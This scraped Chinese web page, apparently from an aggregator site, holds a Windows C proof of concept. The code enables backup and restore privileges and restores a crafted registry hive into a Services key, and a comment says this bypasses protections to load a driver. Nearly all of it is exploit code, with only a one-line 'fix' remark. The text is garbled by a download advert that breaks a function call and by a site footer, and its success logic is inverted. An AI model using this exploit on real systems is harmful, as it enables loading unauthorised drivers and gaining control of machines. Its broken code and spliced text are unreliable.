BOOL EnableDebugPriv(LPCTSTR lpName){BOOL bRet = FALSE;HANDLE hToken = NULL;TOKEN_PRIVILEGES tp;LUID luid;do{if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES
软件推荐:
(专业提供下载)
TOKEN_QUERY,&hToken))break;if(!LookupPrivilegeValue(NULL,lpName,&luid))break;tp.PrivilegeCount = 1;tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;tp.Privileges[0].Luid = luid;bRet = AdjustTokenPrivileges(hToken,0,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL);}while(FALSE);if(hToken != NULL)CloseHandle(hToken);return bRet;}BOOL DumpReg(HKEY hKey,LPCSTR lpSubKey,TCHAR szFilePath[MAX_PATH]){BOOL bRet = FALSE;HKEY hCur = NULL;do{if(!EnableDebugPriv(SE_BACKUP_NAME))break;if(RegOpenKeyEx(hKey,lpSubKey,NULL,KEY_ALL_ACCESS,&hCur) != ERROR_SUCCESS)break;if(RegSaveKey(hCur,szFilePath,NULL) != ERROR_SUCCESS)bRet = TRUE;}while(FALSE);if(hCur)RegCloseKey(hCur);return bRet;}BOOL RestoreReg(HKEY hKey,LPCSTR lpSubKey,TCHAR szFilePath[MAX_PATH]){BOOL bRet = FALSE;HKEY hCur = NULL;do{if(!EnableDebugPriv(SE_RESTORE_NAME))break;if(RegOpenKeyEx(hKey,lpSubKey,NULL,KEY_ALL_ACCESS,&hCur) != ERROR_SUCCESS &&RegCreateKey(hKey,lpSubKey,&hCur) != ERROR_SUCCESS)break;if(RegRestoreKey(hCur,szFilePath,REG_FORCE_RESTORE) != ERROR_SUCCESS)bRet = TRUE;}while(FALSE);if(hCur)RegCloseKey(hCur);return bRet;}int main(int argc, char* argv[]){//先本地构造生成一个poc hiv文件// DumpReg(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\poc","C:\\poc.hiv");//远程饶过写注册表加载驱动RestoreReg(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\poc","C:\\poc.hiv");return 0;}修复方案:牺牲点用户体验吧就爱阅读www.92to.com网友整理上传,为您提供最全的知识大全,期待您的分享,转载请注明出处。
……